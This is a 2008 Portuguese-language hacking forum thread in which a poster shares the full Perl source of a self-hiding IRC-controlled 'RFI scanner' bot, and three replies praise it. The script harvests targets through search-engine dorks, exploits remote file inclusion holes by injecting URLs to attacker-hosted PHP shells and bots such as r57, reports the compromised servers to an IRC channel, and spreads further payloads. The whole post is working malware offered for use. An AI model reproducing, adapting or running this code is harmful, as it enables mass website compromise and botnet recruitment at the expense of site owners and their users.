The Pitbull scan Rfi versão priv8

Iniciado por Zero cool, 12 de Maio , 2008, 12:17:16 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

Zero cool

12 de Maio , 2008, 12:17:16 AM Última edição: 12 de Maio , 2008, 10:56:44 AM por Wuefez
Código Selecionar
#!/usr/bin/perl
######################
#                    #
# PRIVATE !          #
#                    #
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################
# RFI Scanner                                                                                                          #
#                                                                                                                      #
# Many Engines on this one...                                                                                          #
# Thanks to Exodus and fuck Morgan                                                                                     #
#                                                                                                                      #
# Good Luck,                                                                                                           #
#            The TECHO                                                                                               #
########################################################################################################################
#                    #
# PRIVATE !          #
#                    #
######################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
######################
######################
#   Configuration    #
#                    #
######################
my $processo = "/usr/sbin/httpd";
my $cmd ="http://www.domaine-de-la-perdrix.fr/agenda/images/c?";
my $server="irc.indoirc.net";
my $porta="6667";
my $nick="[Scan-TDO]".(int(rand(999)));
my $canale="#??";
my $verbot = "6.51";
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER SucK pit *  : Insiderz : staff@google.it : durhakascan :crew\r\n";
print $sk "JOIN $canale\r\n";
stampa($sk, "PRIVMSG Insiderz :Master ganteng!!!");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 4InsiderzCreW 8Scanner3 2008 0]=-");
while($line = <$sk>){
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}
######################
#End of Configuration#
#                    #
######################
######################
######################
#     Commands       #
#                    #
######################
### !bite = exit
if ($line=~ /PRIVMSG $nick :!exit/){
stampa($sk, "QUIT : suckkkkkkk!!");
}
if ($line=~ /PRIVMSG $nick :!join/){
stampa($sk, "JOIN $canale");
}
if ($line=~ /PRIVMSG $nick :!cmd/){
stampa($sk, "PRIVMSG fuck :$cmd ");
}
### end of !bite
### !info = show some information about the bot
if ($line=~ /PRIVMSG $canale :!info/){
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13INFO0 : 4Insiderz 8Scanner3 2008 0]=-");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13INFO0 : 4Mesin Pencari0 : 8Google,Altavista,3AllTheWeb,ASK,AOL 0]=-");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13INFO0 : 4Create 8By 3Insiderz 0]=-");
}
### end of !info
### !system = shows info about b0x that scan is running 0n.
if ($line=~ /PRIVMSG $canale :.system/){
$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Info of BOT  : 7 Servidor :Hiden : 6667");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Uname -a     : 7 $uname");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Uptime       : 7 $uptime");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Own Prosses  : 7 $processo");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12ID           : 7 $id");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Own Dir      : 7 $ownd");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12OS           : 7 $distro");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Owner        : 7 Insiderz");
stampa($sk, "PRIVMSG $canale :4|12.:4System Info12:.4| 12Channel      : 7 $canale");
}
### end of !system
### !help = shows commands
if ($line=~ /PRIVMSG $canale :!bantuan/){
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Bantuan0 : 4Command 8Insiderz 3Scanner 0]=-");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Bantuan0 : 4!system 8!info 3!scan bug dork 0]=-");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Bantuan0 : No Patch , No Deface 0]=-");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Bantuan0 : http://veldega-tour.ru/.log/dork.txt 0]=-");
}
### end of !info
######################
#  End of Commands   #
#                    #
######################
######################
######################
#     SCANNER        #
#                    #
#!xpl <vuln> <dork> #
#                    #
######################
if ($line=~ /PRIVMSG $canale :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
### Start Message
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- 4Scan 8DiMulai 3Untuk0 $bug $dork");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- 4Dont 8Patch 3Shell");
### End of Start Message
my @glist=&google($dork);
my @alist=&altavista($dork);
my @allist=&alltheweb($dork);
my @mlist=&msn($dork);
my @uollist=&uol($dork);
push(my @tot,@glist,@alist,@allist,@mlist,@uollist);
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- 4Total 8Pencarian0 ".scalar(@tot)." 3Situs");
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- 4Sudah 8Bersih0 ".scalar(@puliti)." 3Situs");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %50==0){
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Exploit0 ]=- ".$contatore." 4Dari8 ".$uni. " 3Situs");
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- 4Scan 8Complete 3Untuk 0$bug $dork");
}
### Print CMD and TEST CMD d0nt change the TEST cmd !........###
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug."http://www.redladys.net/tgp/alat/botphp.txt"."?";
### End of Print CMD and TEST CMD d0nt change the TEST cmd !.###
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /Mic22/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :0,1 4 8 9 14 14 14 4[8Safe4Mode-9OFF4] 4".$print."1 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG rezaneh :0,1 4 8 9 14 14 14 4[8Safe4Mode-9OFF4] 4".$print."1 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG isur :0,1 4 8 9 14 14 14 4[8Safe4Mode-9OFF4] 4".$print."1 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG pepez :0,1 4 8 9 14 14 14 4[8Safe4Mode-9OFF4] 4".$print."1 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG durhaka :0,1 4 8 9 14 14 14 4[8Safe4Mode-9OFF4] 4".$print."1 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG $canale :0,1 7[3uname -a7] ( 13$alb 7) ");
stampa($sk, "PRIVMSG $canale :0,1 7[3id7] ( 13$alb3 7) ");
stampa($sk, "PRIVMSG $canale :0,1 7[3pwd7] ( 13$alb4 7) ");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- Loading spread");
### Print CMD and TEST CMD d0nt change the TEST cmd !........###
my $test2="http://".$sito.$bug."http://tompakovcapital.com/.dat/mys/echo.txt?";
my $reqz=HTTP::Request->new(GET=>$test2);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
my $test3="http://".$sito.$bug."http://tompakovcapital.com/sportt/r57?";
my $reqz=HTTP::Request->new(GET=>$test3);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- Spread loaded");
}}
elsif($re =~ /Mic22/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :0,1 4 8 9 14 14 14 4[9Safe4Mode-8ON4] 9".$print." 14 14 14 9 8 4 ");
stampa($sk, "PRIVMSG $canale :0,1 7[3uname -a7] ( 8$alb 7) ");
stampa($sk, "PRIVMSG $canale :0,1 7[3id7] ( 8$alb3 7) ");
stampa($sk, "PRIVMSG $canale :0,1 7[3pwd7] ( 8$alb4 7) ");
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- Loading spread");
my $test2="http://".$sito.$bug."http://www.redladys.net/tgp/alat/botphp.txt?";
my $reqz=HTTP::Request->new(GET=>$test2);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
stampa($sk, "PRIVMSG $canale :0,1 -=[ 13Insiderz0 ]=- Spread loaded");
}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}
sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $str;
while($Res=~m/<br>uname -a:(.+?)\<br>/g){
$alb=$1;}
while($Res=~m/<br>id:(.+?)\<br>/g){
$alb3=$1;}
while($Res=~m/<br>pwd:(.+?)\<br>/g){
$alb4=$1;}
return $str;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.co.uk/search?hl=en&q=".key($key)."&btnG=&meta=&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://www.altavista.com/web/results?itag=ody&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/<span class=ngrn>(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/br/index.html?ref=homeuol&q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
by Zero cool
 8)

Joey

#1
12 de Maio , 2008, 01:07:08 AM
Nossa =o
parece ser um otimo scan zero cool.
vou dar uma fuçada nele...
muito obg pelo post  :D
Com um punhado de areia eu mostrarei o terror à vocês.

Mateus

#2
12 de Maio , 2008, 10:54:02 AM
o código é ótimo(para os que interessam-se por Perl).
mas a utilidade deixa a desejar...
H4X with axes 8)

ÐλяkFeλя

#3
12 de Maio , 2008, 11:45:00 AM
muito bom zero cool...vou da uma olhada melhor aqui nele....thanks....abraços...
Imprimir
Ir para o topo Páginas1
Ações